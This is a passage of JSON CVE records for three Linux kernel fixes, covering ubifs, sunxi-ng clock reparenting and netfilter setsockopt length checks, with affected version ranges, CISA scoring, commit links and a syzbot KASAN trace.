"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35821",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-23T21:47:42.750475Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-772",
"description": "CWE-772 Missing Release of Resource after Effective Lifetime",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-23T21:48:10.927Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.066Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4aa554832b9dc9e66249df75b8f447d87853e12e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/778c6ad40256f1c03244fc06d7cdf71f6b5e7310"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f599ab6fabbca4c741107eade70722a98adfd9f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f19b1023a3758f40791ec166038d6411c8894ae3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/142d87c958d9454c3cffa625fab56f3016e8f9f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fc99f4e2d2f1ce766c14e98463c2839194ae964f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17772bbe9cfa972ea1ff827319f6e1340de76566"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/723012cab779eee8228376754e22c6594229bf8f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ubifs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4aa554832b9dc9e66249df75b8f447d87853e12e",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "778c6ad40256f1c03244fc06d7cdf71f6b5e7310",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "8f599ab6fabbca4c741107eade70722a98adfd9f",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "f19b1023a3758f40791ec166038d6411c8894ae3",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "142d87c958d9454c3cffa625fab56f3016e8f9f3",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "fc99f4e2d2f1ce766c14e98463c2839194ae964f",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "17772bbe9cfa972ea1ff827319f6e1340de76566",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
},
{
"lessThan": "723012cab779eee8228376754e22c6594229bf8f",
"status": "affected",
"version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ubifs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.27"
},
{
"lessThan": "2.6.27",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nubifs: Set page uptodate in the correct place\n\nPage cache reads are lockless, so setting the freshly allocated page\nuptodate before we\u0027ve overwritten it with the data it\u0027s supposed to have\nin it will allow a simultaneous reader to see old data. Move the call\nto SetPageUptodate into ubifs_write_end(), which is after we copied the\nnew data into the page."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:08.823Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4aa554832b9dc9e66249df75b8f447d87853e12e"
},
{
"url": "https://git.kernel.org/stable/c/778c6ad40256f1c03244fc06d7cdf71f6b5e7310"
},
{
"url": "https://git.kernel.org/stable/c/8f599ab6fabbca4c741107eade70722a98adfd9f"
},
{
"url": "https://git.kernel.org/stable/c/f19b1023a3758f40791ec166038d6411c8894ae3"
},
{
"url": "https://git.kernel.org/stable/c/142d87c958d9454c3cffa625fab56f3016e8f9f3"
},
{
"url": "https://git.kernel.org/stable/c/fc99f4e2d2f1ce766c14e98463c2839194ae964f"
},
{
"url": "https://git.kernel.org/stable/c/4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e"
},
{
"url": "https://git.kernel.org/stable/c/17772bbe9cfa972ea1ff827319f6e1340de76566"
},
{
"url": "https://git.kernel.org/stable/c/723012cab779eee8228376754e22c6594229bf8f"
}
],
"title": "ubifs: Set page uptodate in the correct place",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35821",
"datePublished": "2024-05-17T13:23:24.350Z",
"dateReserved": "2024-05-17T12:19:12.345Z",
"dateUpdated": "2025-05-04T09:06:08.823Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52882 (GCVE-0-2023-52882)
Vulnerability from cvelistv5
Published
2024-05-30 15:23
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: sunxi-ng: h6: Reparent CPUX during PLL CPUX rate change
While PLL CPUX clock rate change when CPU is running from it works in
vast majority of cases, now and then it causes instability. This leads
to system crashes and other undefined behaviour. After a lot of testing
(30+ hours) while also doing a lot of frequency switches, we can't
observe any instability issues anymore when doing reparenting to stable
clock like 24 MHz oscillator.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 Version: 524353ea480b0094c16f2b5684ce7e0a23ab3685 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:02:56.946Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe11826ffa200e1a7a826e745163cb2f47875f66"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfc78b4628497eb6df09a6b5bba9dd31616ee175"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1fa9a9816204ac4b118b2e613d3a7c981355019"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70f64cb29014e4c4f1fabd3265feebd80590d069"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b82eb134d2942ecc669e2ab2be3f0a58d79428a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9708e5081cfc4f085690294163389bcf82655f90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e91ed763dc07437777bd012af7a2bd4493731ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0010/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52882",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:16:16.700921Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:35:00.657Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/sunxi-ng/ccu-sun50i-h6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fe11826ffa200e1a7a826e745163cb2f47875f66",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
},
{
"lessThan": "bfc78b4628497eb6df09a6b5bba9dd31616ee175",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
},
{
"lessThan": "f1fa9a9816204ac4b118b2e613d3a7c981355019",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
},
{
"lessThan": "70f64cb29014e4c4f1fabd3265feebd80590d069",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
},
{
"lessThan": "0b82eb134d2942ecc669e2ab2be3f0a58d79428a",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
},
{
"lessThan": "9708e5081cfc4f085690294163389bcf82655f90",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
},
{
"lessThan": "7e91ed763dc07437777bd012af7a2bd4493731ff",
"status": "affected",
"version": "524353ea480b0094c16f2b5684ce7e0a23ab3685",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/sunxi-ng/ccu-sun50i-h6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: sunxi-ng: h6: Reparent CPUX during PLL CPUX rate change\n\nWhile PLL CPUX clock rate change when CPU is running from it works in\nvast majority of cases, now and then it causes instability. This leads\nto system crashes and other undefined behaviour. After a lot of testing\n(30+ hours) while also doing a lot of frequency switches, we can\u0027t\nobserve any instability issues anymore when doing reparenting to stable\nclock like 24 MHz oscillator."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:11.091Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fe11826ffa200e1a7a826e745163cb2f47875f66"
},
{
"url": "https://git.kernel.org/stable/c/bfc78b4628497eb6df09a6b5bba9dd31616ee175"
},
{
"url": "https://git.kernel.org/stable/c/f1fa9a9816204ac4b118b2e613d3a7c981355019"
},
{
"url": "https://git.kernel.org/stable/c/70f64cb29014e4c4f1fabd3265feebd80590d069"
},
{
"url": "https://git.kernel.org/stable/c/0b82eb134d2942ecc669e2ab2be3f0a58d79428a"
},
{
"url": "https://git.kernel.org/stable/c/9708e5081cfc4f085690294163389bcf82655f90"
},
{
"url": "https://git.kernel.org/stable/c/7e91ed763dc07437777bd012af7a2bd4493731ff"
}
],
"title": "clk: sunxi-ng: h6: Reparent CPUX during PLL CPUX rate change",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52882",
"datePublished": "2024-05-30T15:23:46.242Z",
"dateReserved": "2024-05-21T15:35:00.781Z",
"dateUpdated": "2025-05-04T07:45:11.091Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35896 (GCVE-0-2024-35896)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: validate user input for expected length
I got multiple syzbot reports showing old bugs exposed
by BPF after commit 20f2505fb436 ("bpf: Try to avoid kzalloc
in cgroup/{s,g}etsockopt")
setsockopt() @optlen argument should be taken into account
before copying data.
BUG: KASAN: slab-out-of-bounds in copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]
BUG: KASAN: slab-out-of-bounds in copy_from_sockptr include/linux/sockptr.h:55 [inline]
BUG: KASAN: slab-out-of-bounds in do_replace net/ipv4/netfilter/ip_tables.c:1111 [inline]
BUG: KASAN: slab-out-of-bounds in do_ipt_set_ctl+0x902/0x3dd0 net/ipv4/netfilter/ip_tables.c:1627
Read of size 96 at addr ffff88802cd73da0 by task syz-executor.4/7238
CPU: 1 PID: 7238 Comm: syz-executor.4 Not tainted 6.9.0-rc2-next-20240403-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114
print_address_description mm/kasan/report.c:377 [inline]
print_report+0x169/0x550 mm/kasan/report.c:488
kasan_report+0x143/0x180 mm/kasan/report.c:601
kasan_check_range+0x282/0x290 mm/kasan/generic.c:189
__asan_memcpy+0x29/0x70 mm/kasan/shadow.c:105
copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]
copy_from_sockptr include/linux/sockptr.h:55 [inline]
do_replace net/ipv4/netfilter/ip_tables.c:1111 [inline]
do_ipt_set_ctl+0x902/0x3dd0 net/ipv4/netfilter/ip_tables.c:1627
nf_setsockopt+0x295/0x2c0 net/netfilter/nf_sockopt.c:101
do_sock_setsockopt+0x3af/0x720 net/socket.c:2311
__sys_setsockopt+0x1ae/0x250 net/socket.c:2334
__do_sys_setsockopt net/socket.c:2343 [inline]
__se_sys_setsockopt net/socket.c:2340 [inline]
__x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340
do_syscall_64+0xfb/0x240
entry_SYSCALL_64_after_hwframe+0x72/0x7a
RIP: 0033:0x7fd22067dde9
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 e1 20 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fd21f9ff0c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000036
RAX: ffffffffffffffda RBX: 00007fd2207abf80 RCX: 00007fd22067dde9
RDX: 0000000000000040 RSI: 0000000000000000 RDI: 0000000000000003
RBP: 00007fd2206ca47a R08: 0000000000000001 R09: 0000000000000000
R10: 0000000020000880 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000000b R14: 00007fd2207abf80 R15: 00007ffd2d0170d8
</TASK>
Allocated by task 7238:
kasan_save_stack mm/kasan/common.c:47 [inline]
kasan_save_track+0x3f/0x80 mm/kasan/common.c:68
poison_kmalloc_redzone mm/kasan/common.c:370 [inline]
__kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:387
kasan_kmalloc include/linux/kasan.h:211 [inline]
__do_kmalloc_node mm/slub.c:4069 [inline]
__kmalloc_noprof+0x200/0x410 mm/slub.c:4082
kmalloc_noprof include/linux/slab.h:664 [inline]
__cgroup_bpf_run_filter_setsockopt+0xd47/0x1050 kernel/bpf/cgroup.c:1869
do_sock_setsockopt+0x6b4/0x720 net/socket.c:2293
__sys_setsockopt+0x1ae/0x250 net/socket.c:2334
__do_sys_setsockopt net/socket.c:2343 [inline]
__se_sys_setsockopt net/socket.c:2340 [inline]
__x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340
do_syscall_64+0xfb/0x240
entry_SYSCALL_64_after_hwframe+0x72/0x7a
The buggy address belongs to the object at ffff88802cd73da0
which belongs to the cache kmalloc-8 of size 8
The buggy address is located 0 bytes inside of
allocated 1-byte region [ffff88802cd73da0, ffff88802cd73da1)
The buggy address belongs to the physical page:
page: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88802cd73020 pfn:0x2cd73
flags: 0xfff80000000000(node=0|zone=1|lastcpupid=0xfff)
page_type: 0xffffefff(slab)
raw: 00fff80000000000 ffff888015041280 dead000000000100 dead000000000122
raw: ffff88802cd73020 000000008080007f 00000001ffffefff 00
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35896",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:13:06.429370Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:31.845Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-03-21T18:03:48.842Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f038242b77ddfc505bf4163d4904c1abd2e74d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/440e948cf0eff32cfe322dcbca3f2525354b159b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/18aae2cb87e5faa9c5bd865260ceadac60d5a6c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81d51b9b7c95e791ba3c1a2dd77920a9d3b3f525"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58f2bfb789e6bd3bc24a2c9c1580f3c67aec3018"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c83842df40f86e529db6842231154772c20edcc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250321-0004/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bridge/netfilter/ebtables.c",
"net/ipv4/netfilter/arp_tables.c",
"net/ipv4/netfilter/ip_tables.c",
"net/ipv6/netfilter/ip6_tables.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0f038242b77ddfc505bf4163d4904c1abd2e74d6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "440e948cf0eff32cfe322dcbca3f2525354b159b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "18aae2cb87e5faa9c5bd865260ceadac60d5a6c5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "81d51b9b7c95e791ba3c1a2dd77920a9d3b3f525",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "58f2bfb789e6bd3bc24a2c9c1580f3c67aec3018",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0c83842df40f86e529db6842231154772c20edcc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bridge/netfilter/ebtables.c",
"net/ipv4/netfilter/arp_tables.c",
"net/ipv4/netfilter/ip_tables.c",
"net/ipv6/netfilter/ip6_tables.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
